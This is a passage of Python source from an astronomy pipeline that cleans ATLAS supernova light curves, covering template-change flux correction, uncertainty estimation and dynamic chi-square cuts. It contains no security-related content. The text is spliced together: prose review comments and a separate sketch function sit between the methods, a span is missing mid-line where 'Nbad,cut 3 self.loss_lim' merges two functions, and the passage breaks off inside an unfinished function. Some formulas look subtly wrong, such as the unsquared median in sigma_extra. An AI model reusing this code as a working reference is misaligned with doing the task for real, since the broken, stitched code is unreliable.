')\n\t\t\tprint(f'## Maximum number of clipped measurements (Nclip_max): {self.g_Nclip_max}')\n\t\t\tprint(f'## Minimum number of good measurements (Ngood_min): {self.g_Ngood_min}')\n\t\t\tprint(f'## Maximum chi-square (x2_max): {self.g_x2_max}')\n\n\t\tself.detect_bumps = args.detect_bumps\n\t\tif self.detect_bumps:\n\t\t\tprint(f'\\nDetecting pre-SN bumps: {self.detect_bumps}')\n\t\t\tself.apply_to_controls = cfg['Detecting bumps 
settings']['apply_to_controls']=='True'\n\t\t\tprint(f'# Applying to control light curves in order to establish detection limit: {self.apply_to_controls}')\n\t\t\tself.gaussian_sigma = float(cfg['Detecting bumps settings']['gaussian_sigma'])\n\t\t\tprint(f'# Searching for pre-SN bumps with a sigma of {self.gaussian_sigma:0.2f} days')\n\t\t\t\n\t\t\t# simulated gaussian settings\n\t\t\tif not(args.sim_gaussian is None):\n\t\t\t\tprint(f'# Adding simulated gaussian pre-SN bump to SN light curve: True')\n\t\t\t\tif ',' in args.sim_gaussian[1]:\n\t\t\t\t\tself.appmags = args.sim_gaussian[1].split(',')\n\t\t\t\t\tprint(f'## Multiple magnitudes input: {self.appmags}')\n\t\t\t\telse:\n\t\t\t\t\tself.appmags = [args.sim_gaussian[1]]\n\t\t\t\t\tprint(f'## Only one magnitude input: {self.appmags}')\n\t\t\t\n\t\t\t# custom MJD range for bump detection\n\t\t\tif not(cfg['Detecting bumps settings']['start_mjd'] == 'None'):\n\t\t\t\tself.start_mjd = float(cfg['Detecting bumps settings']['start_mjd'])\n\t\t\t\tprint(f'# Will start bump detection at MJD={self.start_mjd}')\n\t\t\tif not(cfg['Detecting bumps settings']['end_mjd'] == 'None'):\n\t\t\t\tself.end_mjd = float(cfg['Detecting bumps settings']['end_mjd'])\n\t\t\t\tprint(f'# Will end bump detection at MJD={self.end_mjd}')\n\n\t# helper function for get_baseline_regions()\n\tdef get_Ndays(self, SN_region_index):\n\t\treturn 200 if SN_region_index == 2 else 40\n\n\tdef get_SNstart_region(self, discdate, tchange1, tchange2):\n\t\t# find region SN starts in \n\t\tSN_region_index = None\n\t\tif discdate <= tchange1:\n\t\t\tSN_region_index = 0\n\t\telif discdate > tchange1 and discdate <= tchange2:\n\t\t\tSN_region_index = 1\n\t\telif discdate > tchange2:\n\t\t\tSN_region_index = 2\n\t\tif SN_region_index is None:\n\t\t\traise RuntimeError('## ERROR: Something went wrong--could not find region with SN discovery date!')\n\t\telse:\n\t\t\tprint('## SN discovery date located in template region t%d' % SN_region_index)\n\t\treturn SN_region_index\n\n\n\t# get regions of a lc where no SN flux is present\n\tdef get_baseline_regions(self, lc, Ndays_min):\n\t\tprint('# Getting region indices around SN... ')\n\n\t\tbaseline_ix = lc.get_baseline_ix()\n\t\ttchange1 = 58417\n\t\ttchange2 = 58882\n\n\t\tregions = {}\n\t\tregions['t0'] = lc.lcs[0].ix_inrange(colnames=['MJD'], uplim=tchange1)\n\t\tregions['t1'] = lc.lcs[0].ix_inrange(colnames=['MJD'], lowlim=tchange1, uplim=tchange2)\n\t\tregions['t2'] = lc.lcs[0].ix_inrange(colnames=['MJD'], lowlim=tchange2)\n\t\tregions['b_t0'] = AandB(regions['t0'], baseline_ix)\n\t\tregions['b_t1'] = AandB(regions['t1'], baseline_ix)\n\t\tregions['b_t2'] = AandB(regions['t2'], baseline_ix)\n\n\t\tfound_region_ix = []\n\t\tfor region_index in range(0,3):\n\t\t\tif len(regions['t%d'%region_index]) > 0:\n\t\t\t\tprint('## TEMPLATE REGION t%d MJD RANGE: %0.2f - %0.2f' % (region_index, lc.lcs[0].t.loc[regions['t%d'%region_index][0],'MJD'], lc.lcs[0].t.loc[regions['t%d'%region_index][-1],'MJD']))\n\t\t\t\tfound_region_ix.append(region_index)\n\t\t\telse:\n\t\t\t\tprint('## TEMPLATE REGION t%d MJD RANGE: not found' % region_index)\n\t\t\n\t\t# cannot do flux correction?\n\t\tif len(found_region_ix) <= 1 or self.skip_tc:\n\t\t\tprint('WARNING: At least 2 template regions do not contain any data. Therefore, flux could not be corrected according to the ATLAS reference template changes. 
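The region bookkeeping above is a piecewise split of MJD at the two ATLAS template changes; a standalone sketch of the same classification performed by get_SNstart_region, using the constants from the code above:

TCHANGE1, TCHANGE2 = 58417, 58882

def template_region(mjd):
    # Region 0 before the first template change, 1 between the two, 2 after.
    if mjd <= TCHANGE1:
        return 0
    if mjd <= TCHANGE2:
        return 1
    return 2

assert [template_region(m) for m in (58000, 58500, 59000)] == [0, 1, 2]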
Skipping...')\n\t\t\t\"\"\"\n\t\t\t# try to get baseline flux\n\t\t\tSN_region_index = self.get_SNstart_region(lc.discdate, tchange1, tchange2) # find region with SN in it\n\t\t\tif SN_region_index in found_region_ix: # SN discovery date is in one of the found regions\n\t\t\t\t# get last Ndays days for baseline\n\t\t\t\tlc.corrected_baseline_ix = lc.lcs[0].ix_inrange(colnames=['MJD'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlowlim=lc.lcs[0].t.loc[regions['t%d'%SN_region_index][-1],'MJD'] - self.get_Ndays(SN_region_index),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tuplim=lc.lcs[0].t.loc[regions['t%d'%SN_region_index][-1],'MJD'])\n\t\t\telif len(found_region_ix) == 1: # one template region has data\n\t\t\t\t# get all of found template for baseline\n\t\t\t\tlc.corrected_baseline_ix = regions[f't{found_region_ix[0]}']\n\t\t\telse: # no template region has data, so basically no data... this is pretty bad but hopefully will not come to this\n\t\t\t\tlc.corrected_baseline_ix = baseline_ix # will be None\n\t\t\tlc.during_sn_ix = AnotB(lc.lcs[0].getindices(), lc.corrected_baseline_ix)\n\n\t\t\tprint(len(lc.corrected_baseline_ix), lc.corrected_baseline_ix)\n\t\t\tprint(len(lc.during_sn_ix), lc.during_sn_ix)\n\t\t\tsys.exit()\n\t\t\t\"\"\"\n\t\t\tlc.corrected_baseline_ix = baseline_ix\n\t\t\tlc.during_sn_ix = AnotB(lc.lcs[0].getindices(), lc.corrected_baseline_ix)\n\t\t\treturn None, lc\n\n\t\tSN_region_index = self.get_SNstart_region(lc.discdate, tchange1, tchange2)\n\n\t\t# for region with tail end of the SN, get last Ndays days and classify as baseline\n\t\tadjust_region_index = SN_region_index\n\t\tif adjust_region_index < 2 and len(regions['b_t%d'%adjust_region_index]) >= Ndays_min:\n\t\t\tadjust_region_index += 1\n\t\tif len(regions['b_t%d'%adjust_region_index]) < Ndays_min:\n\t\t\tprint('## Getting baseline flux for template region t%d by obtaining last %d days of region... 
' % (adjust_region_index, self.get_Ndays(adjust_region_index)))\n\t\t\tregions['b_t%d'%adjust_region_index] = lc.lcs[0].ix_inrange(colnames=['MJD'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlowlim=lc.lcs[0].t.loc[regions['t%d'%adjust_region_index][-1],'MJD'] - self.get_Ndays(adjust_region_index),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tuplim=lc.lcs[0].t.loc[regions['t%d'%adjust_region_index][-1],'MJD'])\n\t\tif adjust_region_index < 1: regions['b_t1'] = regions['t1']\n\t\tif adjust_region_index < 2: regions['b_t2'] = regions['t2']\n\n\t\tfor region_index in range(0,3):\n\t\t\tif len(regions['b_t%d'%region_index]) > 0:\n\t\t\t\tprint('## TEMPLATE REGION t%d BASELINE MJD RANGE: %0.2f - %0.2f' % (region_index, lc.lcs[0].t.loc[regions['b_t%d'%region_index][0],'MJD'], lc.lcs[0].t.loc[regions['b_t%d'%region_index][-1],'MJD']))\n\t\t\telse:\n\t\t\t\tprint('## TEMPLATE REGION t%d BASELINE MJD RANGE: not found' % region_index)\n\n\t\t# check to make sure baseline flux is still consistent by getting median of first and last halves of affected region\n\t\tfirst_i = regions['b_t%d'%adjust_region_index][0]\n\t\tmid_i = regions['b_t%d'%adjust_region_index][int(len(regions['b_t%d'%adjust_region_index])/2)]\n\t\tlast_i = regions['b_t%d'%adjust_region_index][-1]\n\t\tmedian1 = np.median(lc.lcs[0].t.loc[lc.lcs[0].ix_inrange(colnames=['MJD'], lowlim=lc.lcs[0].t.loc[first_i,'MJD'], uplim=lc.lcs[0].t.loc[mid_i,'MJD']), 'uJy'])\n\t\tmedian2 = np.median(lc.lcs[0].t.loc[lc.lcs[0].ix_inrange(colnames=['MJD'], lowlim=lc.lcs[0].t.loc[mid_i+1,'MJD'], uplim=lc.lcs[0].t.loc[last_i,'MJD']), 'uJy'])\n\t\tprint(f'## Checking that baseline flux is consistent throughout adjusted region...\\n## Median of first half: {median1:0.2f}\\n## Median of second half: {median2:0.2f}')\n\n\t\tlc.corrected_baseline_ix = np.concatenate([regions['b_t0'], regions['b_t1'], regions['b_t2']])\n\t\tlc.during_sn_ix = AnotB(lc.lcs[0].getindices(), lc.corrected_baseline_ix)\n\t\t\n\t\treturn regions, lc\n\n\t# correct control light curves for atlas template changes at mjd=58417,58882 \n\tdef controls_correct_for_template(self, lc, control_index, regions, region_index):\n\t\tgoodx2_i = lc.lcs[control_index].ix_inrange(colnames=['chi/N'], uplim=5)\n\n\t\t# get indices of control lc that match up with SN's baseline region\n\t\t#lowlim = lc.lcs[0].t.loc[regions[f'b_t{region_index}'][0], 'MJD'] \n\t\t#uplim = lc.lcs[0].t.loc[regions[f'b_t{region_index}'][-1], 'MJD']\n\t\t\n\t\t# get indices of target template region\n\t\ttchange1 = 58417\n\t\ttchange2 = 58882\n\t\tlowlim = None\n\t\tuplim = None\n\t\tif region_index == 0:\n\t\t\tuplim = tchange1\n\t\telif region_index == 1:\n\t\t\tlowlim = tchange1\n\t\t\tuplim = tchange2\n\t\telif region_index == 2:\n\t\t\tlowlim = tchange2\n\t\tregion_i = lc.lcs[control_index].ix_inrange(colnames=['MJD'], lowlim=lowlim, uplim=uplim, exclude_uplim=True)\n\n\t\tif len(region_i) > 0:\n\t\t\t# get median of template region\n\t\t\tif len(AandB(region_i,goodx2_i)) > 0:\n\t\t\t\tmedian = np.median(lc.lcs[control_index].t.loc[AandB(region_i,goodx2_i),'uJy'])\n\t\t\telse:\n\t\t\t\tmedian = np.median(lc.lcs[control_index].t.loc[region_i,'uJy'])\n\n\t\t\t#lowlim = lc.lcs[0].t.loc[regions[f't{region_index}'][0], 'MJD']\n\t\t\t#uplim = lc.lcs[0].t.loc[regions[f't{region_index}'][-1], 'MJD']\n\t\t\t#t_region_i = lc.lcs[control_index].ix_inrange(colnames=['MJD'], lowlim=lowlim, uplim=uplim, exclude_uplim=True)\n\t\t\t#lc.lcs[control_index].t.loc[t_region_i,'uJy'] -= median\n\n\t\t\t# subtract median from entire template region of control 
lc\n\t\t\tlc.lcs[control_index].t.loc[region_i,'uJy'] -= median\n\n\t\treturn lc\n\n\t# correct for atlas template changes at mjd=58417,58882 \n\t# more info here: https://fallingstar-data.com/forcedphot/faq/\n\tdef correct_for_template(self, lc):\n\t\tprint('\\nCorrecting for potential flux in template due to template changes at MJD=58417,58882...')\n\t\toutput = ''\n\t\t\n\t\t# automatically define baseline regions according to discovery date\n\t\tregions, lc = self.get_baseline_regions(lc, Ndays_min=6)\n\t\tif regions is None:\n\t\t\toutput += 'Either correction was skipped, or not enough data found in at least 2 template regions. Could not correct for template changes.'\n\t\t\treturn lc, output\n\n\t\t# get indices of measurements with x2<=5 so that when getting median, use these indices if possible\n\t\tb_goodx2_i = lc.lcs[0].ix_inrange(colnames=['chi/N'], uplim=5, indices=lc.corrected_baseline_ix)\n\n\t\t# for each region, adjust for template change by subtracting median of that region's baseline flux\n\t\tfor region_index in range(0,3):\n\t\t\tregion_i = regions[f'b_t{region_index}']\n\t\t\tif len(region_i) > 0:\n\t\t\t\tprint(f'# Adjusting for template change in region b_t{region_index} from {lc.lcs[0].t.loc[region_i[0],\"MJD\"]:0.2f}-{lc.lcs[0].t.loc[region_i[-1],\"MJD\"]:0.2f}...')\n\t\t\t\tprint(f'## Baseline median before: {np.median(lc.lcs[0].t.loc[region_i,\"uJy\"])}')\n\t\t\t\t\n\t\t\t\tif len(AandB(region_i,b_goodx2_i)) > 0:\n\t\t\t\t\tmedian = np.median(lc.lcs[0].t.loc[AandB(region_i,b_goodx2_i),'uJy'])\n\t\t\t\telse:\n\t\t\t\t\tmedian = np.median(lc.lcs[0].t.loc[region_i,'uJy'])\n\n\t\t\t\tprint(f'## Subtracting median {median:0.1f} uJy of baseline flux with chi-square ≤ 5 from light curve flux due to potential flux in the template...')\n\t\t\t\tlc.lcs[0].t.loc[regions['t%d'%region_index],'uJy'] -= median\n\t\t\t\tprint(f'## Baseline median now: {np.median(lc.lcs[0].t.loc[region_i,\"uJy\"])}')\n\t\t\t\toutput += f'\\nCorrection applied to baseline region {region_index}: {median:0.1f} uJy subtracted'\n\n\t\t\t\t# control lc correction\n\t\t\t\tif self.controls:\n\t\t\t\t\tprint(f'## Correcting control light curves for potential flux in template...')\n\t\t\t\t\tfor control_index in range(1,self.num_controls+1):\n\t\t\t\t\t\tlc = self.controls_correct_for_template(lc, control_index, regions, region_index)\n\t\t\telse:\n\t\t\t\tprint(f'# No baseline region for region b_t{region_index}, skipping...')\n\n\t\treturn lc, output\n\n\t# drop mask column and any added columns from previous iterations\n\tdef drop_extra_columns(self, lc, control_index=0):\n\t\tdropcols=[]\n\n\t\tfor col in ['Noffsetlc', 'uJy/duJy', '__tmp_SN', 'SNR', 'SNRsum', 'SNRsumnorm', 'SNRsim', 'SNRsimsum']:\n\t\t\tif col in lc.lcs[control_index].t.columns:\n\t\t\t\tdropcols.append(col)\n\t\tfor col in lc.lcs[control_index].t.columns:\n\t\t\tif re.search('^c\\d_',col): \n\t\t\t\tdropcols.append(col)\n\n\t\t# drop any extra columns\n\t\tif len(dropcols)>0: \n\t\t\t#print('Dropping extra columns: ',dropcols)\n\t\t\tlc.lcs[control_index].t.drop(columns=dropcols,inplace=True)\n\n\t\treturn lc\n\n\tdef apply_true_uncertainties(self, lc):\n\t\toutput = ''\n\t\tfor control_index in range(self.num_controls+1):\n\t\t\tif control_index == 0:\n\t\t\t\tprint('\\nNow estimating true uncertainties for SN light curve...')\n\n\t\t\t\tif len(lc.corrected_baseline_ix) <= 0:\n\t\t\t\t\tprint('WARNING: No available baseline flux! Cannot proceed with true uncertainties estimation. 
Skipping...')\n\t\t\t\t\toutput += '\\nNot enough available baseline flux! Could not proceed with true uncertainties estimation.'\n\t\t\t\t\tfor control_index in range(self.num_controls+1):\n\t\t\t\t\t\tlc.dflux_colnames[control_index] = 'duJy'\n\t\t\t\t\treturn lc, output, False\n\n\t\t\t\tclean_ix = AandB(lc.lcs[0].ix_unmasked('Mask',maskval=self.flags['uncertainty']), lc.lcs[0].ix_inrange(colnames=['chi/N'],uplim=self.estimate_true_uncertainties_chisquare_cut,exclude_uplim=True))\n\t\t\t\tclean_ix = AandB(lc.corrected_baseline_ix, clean_ix)\n\t\t\telse:\n\t\t\t\tprint(f'Now estimating true uncertainties for control light curve {control_index:03d}...')\n\t\t\t\tclean_ix = AandB(lc.lcs[control_index].ix_unmasked('Mask',maskval=self.flags['uncertainty']), lc.lcs[control_index].ix_inrange(colnames=['chi/N'],uplim=self.estimate_true_uncertainties_chisquare_cut,exclude_uplim=True))\n\n\t\t\tlc.lcs[control_index].calcaverage_sigmacutloop('uJy', indices=clean_ix, Nsigma=3.0, median_firstiteration=True, verbose=1)\n\t\t\t#if control_index == 0: print(lc.lcs[control_index].statparams)\n\t\t\tsigma_true_typical = lc.lcs[control_index].statparams['stdev']\n\n\t\t\tmedian_dflux = np.median(lc.lcs[control_index].t.loc[clean_ix, 'duJy'])\n\n\t\t\tif sigma_true_typical > median_dflux:\n\t\t\t\tprint(f'# True typical uncertainty {sigma_true_typical:0.2f} greater the current median uncertainty {median_dflux:0.2f}. Proceeding with true uncertainties estimation...')\n\n\t\t\t\t# for following cuts, use updated uncertainty column for this light curve\n\t\t\t\tlc.dflux_colnames[control_index] = 'duJy_new'\n\n\t\t\t\t# add extra noise source to current noise in new column\n\t\t\t\tsigma_extra = np.sqrt(sigma_true_typical*sigma_true_typical - median_dflux)\n\t\t\t\tprint(f'# Sigma extra calculated: {sigma_extra:0.4f}')\n\t\t\t\t#print('# Adding sigma_extra {sigma_extra:0.4f} to new duJy column...')\n\t\t\t\tlc.lcs[control_index].t['duJy_new'] = np.nan\n\t\t\t\tlc.lcs[control_index].t['duJy_new'] = np.sqrt(lc.lcs[control_index].t['duJy']**2 + sigma_extra**2)\n\n\t\t\t\t#lc.lcs[control_index].t['uJy/duJy_new'] = lc.lcs[control_index].t['uJy']/lc.lcs[control_index].t['duJy_new']\n\n\t\t\t\tif control_index == 0:\n\t\t\t\t\toutput += f' An extra noise of sigma {sigma_extra:0.4f} was added to the uncertainties of the SN light curve and copied to the \"duJy_new\" column.'\n\t\t\t\n\t\t\t\treturn lc, output, True\n\t\t\telse:\n\t\t\t\tprint(f'# True typical uncertainty less than or equal to the current median uncertainty. 
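Two hedged observations on apply_true_uncertainties above: both branches return inside the for loop, so only one light curve is processed per call despite the loop header, and sigma_extra subtracts an unsquared median from a variance, while the later update adds the result in quadrature as sqrt(duJy**2 + sigma_extra**2), which suggests median_dflux should be squared as well. A self-contained sketch of the quadrature update under that assumption (not a claim about the authors' intent):

import numpy as np

def add_extra_noise(duJy, sigma_true_typical, median_dflux):
    # Assumes sigma_true**2 = median_dflux**2 + sigma_extra**2, i.e. the
    # extra noise source adds in quadrature to the reported uncertainties.
    sigma_extra = np.sqrt(sigma_true_typical**2 - median_dflux**2)
    return np.sqrt(np.asarray(duJy)**2 + sigma_extra**2)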
Skipping true uncertainties estimation.')\n\t\t\t\treturn lc, output, False\n\n\n\t# apply uncertainty cut to SN light curve and update mask column with flag\n\tdef apply_uncertainty_cut(self, lc):\n\t\tprint('\\nNow applying uncertainty cut...')\n\n\t\t# update SN mask column with final chi-square cut and apply same cut to control light curves\n\t\tfor control_index in range(self.num_controls+1):\n\t\t\tcut_ix = lc.lcs[control_index].ix_inrange(colnames=['duJy'], lowlim=self.uncertainty_cut, exclude_lowlim=True)\n\t\t\tlc.update_mask_col(self.flags['uncertainty'], cut_ix, control_index=control_index)\n\t\t\tif control_index == 0:\n\t\t\t\ts = f'Total percent of data flagged: {100*len(cut_ix)/len(lc.lcs[0].getindices()):0.2f}%'\n\t\t\t\toutput = f'\\n\\n{s}.'\n\t\t\t\tprint(f'# {s}')\n\n\t\treturn lc, output\n\n\t# for a range of chi-square cuts, determine contamination, loss, and other pecentages\n\tdef get_limcuts_table(self, lc, indices=None):\n\t\tlimcuts = pdastrostatsclass(columns=['PSF Chi-Square Cut', 'N', 'Ngood', 'Nbad', 'Nkept', 'Ncut', 'Ngood,kept', 'Ngood,cut', 'Nbad,kept', 'Nbad,cut',\n\t\t\t\t\t\t\t\t\t\t\t 'Pgood,kept', 'Pgood,cut', 'Pbad,kept', 'Pbad,cut', 'Ngood,kept/Ngood', 'Ploss', 'Pcontamination',\n\t\t\t\t\t\t\t\t\t\t\t 'Nbad,cut 3 self.loss_lim and max_loss > self.loss_lim:\n\t\t\t\tloss_case = 'above lim'\n\t\t\t\ta = np.where(limcuts.t['Ploss'] == min_loss)[0]\n\t\t\t\tb = limcuts.t.iloc[a]\n\t\t\t\tc = b.iloc[(b['PSF Chi-Square Cut']).argsort()].reset_index()\n\t\t\t\tloss_cut = c.loc[0,'PSF Chi-Square Cut']\n\t\t\t# else if loss crosses lim at some point, loss_cut is min cut with max% loss <= loss_lim\n\t\t\telse:\n\t\t\t\tloss_case = 'crosses lim'\n\t\t\t\tvalid_cuts = sortby_loss[sortby_loss['Ploss'] <= self.loss_lim]\n\t\t\t\ta = np.where(limcuts.t['Ploss'] == valid_cuts.loc[len(valid_cuts)-1,'Ploss'])[0]\n\t\t\t\t# sort by cuts\n\t\t\t\tb = limcuts.t.iloc[a]\n\t\t\t\tc = b.iloc[(b['PSF Chi-Square Cut']).argsort()].reset_index()\n\t\t\t\t# get midpoint of loss1 and loss2 (two points on either side of lim)\n\t\t\t\tloss1_i = np.where(limcuts.t['PSF Chi-Square Cut'] == c.loc[0,'PSF Chi-Square Cut'])[0][0]\n\t\t\t\tif limcuts.t.loc[loss1_i,'Ploss'] == self.loss_lim:\n\t\t\t\t\tloss_cut = limcuts.t.loc[loss1_i,'PSF Chi-Square Cut']\n\t\t\t\telse:\n\t\t\t\t\tloss2_i = loss1_i - 1\n\t\t\t\t\tx = np.array([limcuts.t.loc[loss1_i,'PSF Chi-Square Cut'], limcuts.t.loc[loss2_i,'PSF Chi-Square Cut']])\n\t\t\t\t\tcontam_y = np.array([limcuts.t.loc[loss1_i,'Pcontamination'], limcuts.t.loc[loss2_i,'Pcontamination']])\n\t\t\t\t\tloss_y = np.array([limcuts.t.loc[loss1_i,'Ploss'], limcuts.t.loc[loss2_i,'Ploss']])\n\t\t\t\t\tcontam_line = np.polyfit(x,contam_y,1)\n\t\t\t\t\tloss_line = np.polyfit(x,loss_y,1)\n\t\t\t\t\tloss_cut = (self.loss_lim-loss_line[1])/loss_line[0]\n\n\t\tsortby_contam = limcuts.t.iloc[(limcuts.t['Pcontamination']).argsort()].reset_index()\n\t\tmin_contam = sortby_contam.loc[0,'Pcontamination']\n\t\tmax_contam = sortby_contam.loc[len(sortby_contam)-1,'Pcontamination']\n\t\t# if all contam below lim, contam_cut is max cut\n\t\tif min_contam < self.contam_lim and max_contam < self.contam_lim:\n\t\t\tcontam_case = 'below lim'\n\t\t\tcontam_cut = limcuts.t.loc[len(limcuts.t)-1,'PSF Chi-Square Cut']\n\t\telse:\n\t\t\t# else if all contam above lim, contam_cut is max cut with min% contam\n\t\t\tif min_contam > self.contam_lim and max_contam > self.contam_lim:\n\t\t\t\tcontam_case = 'above lim'\n\t\t\t\ta = np.where(limcuts.t['Pcontamination'] == 
min_contam)[0]\n\t\t\t\tb = limcuts.t.iloc[a]\n\t\t\t\tc = b.iloc[(b['PSF Chi-Square Cut']).argsort()].reset_index()\n\t\t\t\tcontam_cut = c.loc[len(c)-1,'PSF Chi-Square Cut']\n\t\t\t# else if contam crosses lim at some point, contam_cut is max cut with max% contam <= contam_lim\n\t\t\telse:\n\t\t\t\tcontam_case = 'crosses lim'\n\t\t\t\tvalid_cuts = sortby_contam[sortby_contam['Pcontamination'] <= self.contam_lim]\n\t\t\t\ta = np.where(limcuts.t['Pcontamination'] == valid_cuts.loc[len(valid_cuts)-1,'Pcontamination'])[0]\n\t\t\t\t# sort by cuts\n\t\t\t\tb = limcuts.t.iloc[a]\n\t\t\t\tc = b.iloc[(b['PSF Chi-Square Cut']).argsort()].reset_index()\n\t\t\t\tcontam1_i = np.where(limcuts.t['PSF Chi-Square Cut'] == c.loc[len(c)-1,'PSF Chi-Square Cut'])[0][0]\n\t\t\t\tif limcuts.t.loc[contam1_i,'Pcontamination'] == self.contam_lim:\n\t\t\t\t\tcontam_cut = limcuts.t.loc[contam1_i,'PSF Chi-Square Cut']\n\t\t\t\telse:\n\t\t\t\t\tcontam2_i = contam1_i + 1\n\t\t\t\t\tx = np.array([limcuts.t.loc[contam1_i,'PSF Chi-Square Cut'], limcuts.t.loc[contam2_i,'PSF Chi-Square Cut']])\n\t\t\t\t\tcontam_y = np.array([limcuts.t.loc[contam1_i,'Pcontamination'], limcuts.t.loc[contam2_i,'Pcontamination']])\n\t\t\t\t\tloss_y = np.array([limcuts.t.loc[contam1_i,'Ploss'], limcuts.t.loc[contam2_i,'Ploss']])\n\t\t\t\t\tcontam_line = np.polyfit(x,contam_y,1)\n\t\t\t\t\tloss_line = np.polyfit(x,loss_y,1)\n\t\t\t\t\tcontam_cut = (self.contam_lim - contam_line[1])/contam_line[0]\n\n\t\tloss_cut_data = self.get_limcuts_data(lc, 'loss_cut', loss_cut, loss_case)\n\t\tcontam_cut_data = self.get_limcuts_data(lc, 'contam_cut', contam_cut, contam_case)\n\n\t\treturn contam_cut_data, loss_cut_data\n\n\t# choose between contamination cut and loss cut\n\tdef get_final_chisquare_cut(self, contam_cut, loss_cut, contam_case, loss_case):\n\t\tcase1 = loss_case == 'below lim' or contam_case == 'below lim'\n\t\tcase2 = loss_case == 'above lim' or contam_case == 'above lim'\n\t\tcase3 = loss_case == 'crosses lim' or contam_case == 'crosses lim'\n\n\t\t# case 1 and 1: final_cut = 3\n\t\t# case 1 and 2: take limit of case 2\n\t\t# case 1 and 3: take limit of case 3\n\t\t# case 2 and 2: print lims don't work\n\t\t# case 2 and 3: get_final_chisquare_cut\n\t\t# case 3 and 3: get_final_chisquare_cut\n\n\t\tfinal_cut = None\n\t\tif case1 and not case2 and not case3: # 1 and 1\n\t\t\tprint(f'# Valid chi-square cut range from {loss_cut:0.2f} to {contam_cut:0.2f}! Setting to {self.min_cut:0.2f}...')\n\t\t\tfinal_cut = self.min_cut\n\t\telif case1: # 1\n\t\t\tif case2: # and 2\n\t\t\t\tif loss_case == 'above lim':\n\t\t\t\t\tprint(f'# WARNING: contam_cut <= {contam_cut:0.2f} falls below limit {self.contam_lim:0.2f}%, but loss_cut >= {loss_cut:0.2f} falls above limit {self.loss_lim:0.2f}%! Setting to {loss_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = loss_cut\n\t\t\t\telse:\n\t\t\t\t\tprint(f'# WARNING: loss_cut <= {loss_cut:0.2f} falls below limit {self.loss_lim:0.2f}%, but contam_cut >= {contam_cut:0.2f} falls above limit {self.contam_lim:0.2f}%! 
Setting to {contam_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = contam_cut\n\t\t\telse: # and 3\n\t\t\t\tif loss_case == 'crosses lim':\n\t\t\t\t\tprint(f'# contam_cut <= {contam_cut:0.2f} falls below limit {self.contam_lim:0.2f}% and loss_cut >= {loss_cut:0.2f} crosses limit {self.loss_lim:0.2f}%, setting to {loss_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = loss_cut\n\t\t\t\telse:\n\t\t\t\t\tprint(f'# loss_cut <= {loss_cut:0.2f} falls below limit {self.loss_lim:0.2f}% and contam_cut >= {contam_cut:0.2f} crosses limit {self.contam_lim:0.2f}%, setting to {contam_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = contam_cut\n\t\telif case2 and not case3: # 2 and 2\n\t\t\tprint(f'# ERROR: chi-square loss_cut >= {loss_cut:0.2f} and contam_cut <= {contam_cut:0.2f} both fall above respective limits {self.loss_lim:0.2f}% and {self.contam_lim:0.2f}%! Try setting less strict limits. Setting final cut to nan.')\n\t\t\tfinal_cut = np.nan\n\t\telse: # 2 and 3 or 3 and 3\n\t\t\tif loss_cut > contam_cut:\n\t\t\t\tprint(f'# WARNING: chi-square loss_cut >= {loss_cut:0.2f} and contam_cut <= {contam_cut:0.2f} do not overlap!')\n\t\t\t\tif self.lim_to_prioritize == 'contam_lim':\n\t\t\t\t\tprint(f'# Prioritizing {self.lim_to_prioritize} and setting to {contam_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = contam_cut\n\t\t\t\telse:\n\t\t\t\t\tprint(f'# Prioritizing {self.lim_to_prioritize} and setting to {loss_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = loss_cut\n\t\t\telse:\n\t\t\t\tprint(f'# Valid chi-square cut range from {loss_cut:0.2f} to {contam_cut:0.2f}!')\n\t\t\t\tif self.lim_to_prioritize == 'contam_lim':\n\t\t\t\t\tprint(f'# Prioritizing {self.lim_to_prioritize} and setting to {loss_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = loss_cut\n\t\t\t\telse:\n\t\t\t\t\tprint(f'# Prioritizing {self.lim_to_prioritize} and setting to {contam_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = contam_cut\n\t\treturn final_cut\n\n\t# apply chi-square cut to SN light curve and update mask column with flag\n\tdef apply_chisquare_cut(self, args, lc, plot=None):\n\t\tprint('\\nNow applying dynamic chi-square cut...')\n\n\t\tif self.chisquare_cut is None:\n\t\t\tlimcuts = self.get_limcuts_table(lc)\n\t\t\tcontam_cut_data, loss_cut_data = self.get_limcuts(lc, limcuts)\n\n\t\t\tif args.plot:\n\t\t\t\tif plot is None:\n\t\t\t\t\traise RuntimeError('Plot object not passed to apply_chisquare_cut()!')\n\t\t\t\tplot.plot_limcuts(limcuts, contam_cut_data['cut'], loss_cut_data['cut'], self.contam_lim, self.loss_lim, self.min_cut, self.max_cut)\n\n\t\t\tprint(f'# Contamination cut according to given contam_limit, with {contam_cut_data[\"Pcontamination\"]:0.2f}% contamination and {contam_cut_data[\"Ploss\"]:0.2f}% loss: {contam_cut_data[\"cut\"]:0.2f}')\n\t\t\tif contam_cut_data['case'] == 'above lim':\n\t\t\t\tprint(f'## WARNING: Contamination cut not possible with contamination <= contam_lim {self.contam_lim:0.2f}%!')\n\t\t\tprint(f'# Loss cut according to given loss_limit, with {loss_cut_data[\"Pcontamination\"]:0.2f}% contamination and {loss_cut_data[\"Ploss\"]:0.2f}% loss: {loss_cut_data[\"cut\"]:0.2f}')\n\t\t\tif loss_cut_data['case'] == 'above lim':\n\t\t\t\tprint(f'## WARNING: Loss cut not possible with loss <= loss_lim {self.loss_lim:0.2f}%!')\n\n\t\t\tfinal_cut = self.get_final_chisquare_cut(contam_cut_data['cut'], loss_cut_data['cut'], contam_cut_data['case'], loss_cut_data['case'])\n\n\t\t\tif np.isnan(final_cut):\n\t\t\t\traise RuntimeError('\\n# ERROR: Final suggested chi-square cut could not be determined according to given contamination and loss limits. 
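One consistency note on the branches above: load_settings() validates lim_to_prioritize against the strings 'loss' and 'contamination', while get_final_chisquare_cut compares it to 'contam_lim', which can therefore never match, so the else branches always win. A minimal sketch of the tie-break with consistent names (an assumption about the intended behavior, not the original logic):

def prioritized_cut(lim_to_prioritize, loss_cut, contam_cut):
    # lim_to_prioritize is 'loss' or 'contamination', as validated upstream
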